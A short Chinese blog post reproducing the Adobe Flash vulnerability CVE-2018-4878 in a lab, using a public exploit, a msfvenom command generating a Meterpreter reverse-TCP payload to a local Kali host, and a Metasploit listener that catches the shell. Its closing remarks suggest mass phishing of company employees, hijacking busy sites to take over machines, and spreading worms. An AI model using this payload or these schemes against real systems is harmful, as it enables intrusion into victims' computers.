r0ckyzzz's Blog.

CVE-2018-4878复现

Word count: 353Reading time: 1 min
2020/02/22 Share

CVE-2018-4878复现

前言

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。
##复现环境
靶机:win7 sp1
攻击机:kali linux
exp:https://github.com/anbai-inc/CVE-2018-4878
flash版本:Adobe Flash 28.0.0.137

流程

靶机里安装flash的流程不再赘述

把exp clone 下来

upload successful

exp里自带的shellcode是windows弹计算器的payload
我们要把payload替换一下 替换成kali的msf生成的shellcode

1
msfvenom  -p windows/meterpreter/reverse_tcp lhost=10.211.55.3  lport=4444  -f python >shellcode.txt

upload successful

替换代码里的shellcode

upload successful

还有要替换的还有路径

upload successful

执行python cve-2018-4878.py 即可完成exp的生成

用kali开启apache2服务
并且把index.html和exploit.swf放到/var/www/html/里

upload successful

用msf监听4444端口

upload successful

用靶机访问

upload successful

msf成功收到反弹的shell

upload successful

想法

及时更新flash
此方法可以在社会工程学中得到很好的运用,例如制造一个钓鱼网页批量发给企业员工,如果有一个人没有更新flash player并且点入链接即中招。
黑客劫持了一个大流量的网站也可以用flash player进行抓鸡 ,或者散播蠕虫。

CATALOG
  1. 1. CVE-2018-4878复现
    1. 1.1. ¶前言
    2. 1.2. ¶流程
    3. 1.3. ¶想法